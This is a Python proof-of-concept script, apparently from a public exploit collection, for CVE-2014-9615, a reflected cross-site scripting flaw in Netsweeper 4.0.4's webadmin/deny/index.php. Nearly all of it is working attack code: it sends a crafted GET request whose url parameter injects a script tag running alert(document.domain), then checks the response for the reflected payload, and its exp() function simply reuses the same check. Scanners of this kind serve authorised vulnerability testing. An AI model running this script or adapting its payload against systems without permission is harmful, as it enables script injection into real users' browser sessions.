2014/CVE-2014-9615/poc/pocsploit/CVE-2014-9615.py

import requests


# Vuln Base Info
def info():
    return {
        "author": "cckuailong",
        "name": '''Netsweeper 4.0.4 - Cross-Site Scripting''',
        "description": '''A cross-site scripting vulnerability in Netsweeper 4.0.4 allows remote attackers to inject arbitrary web script or HTML via the url parameter to webadmin/deny/index.php.''',
        "severity": "medium",
        "references": [
            "https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz", 
            "https://nvd.nist.gov/vuln/detail/CVE-2014-9615"
        ],
        "classification": {
            "cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "cvss-score": "6.1",
            "cve-id": "CVE-2014-9615",
            "cwe-id": "CWE-79"
        },
        "metadata":{
            "vuln-target": "",
            
        },
        "tags": ["cve", "cve2014", "netsweeper", "xss"],
    }


# Vender Fingerprint
def fingerprint(url):
    return True

# Proof of Concept
def poc(url):
    result = {}
    try:
        url = format_url(url)
        path = '/webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=<group_name_eg_netsweeper_student_allow_internet_access&policyname=auto_created&username=root&userip=127.0.0.1&connectionip=127.0.0.1&nsphostname=netsweeper&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

        resp = requests.get(url+path, timeout=10, verify=False, allow_redirects=False)
        if resp.status_code == 200 and "</script><script>alert(document.domain)</script>" in resp.text and "text/html" in str(resp.headers):
            result["success"] = True
            result["info"] = info()
            result["payload"] = url+path

    except:
        result["success"] = False
    
    return result


# Exploit, can be same with poc()
def exp(url):
    return poc(url)


# Utils
def format_url(url):
    url = url.strip()
    if not ( url.startswith('http://') or url.startswith('https://') ):
        url = 'http://' + url
    url = url.rstrip('/')

    return url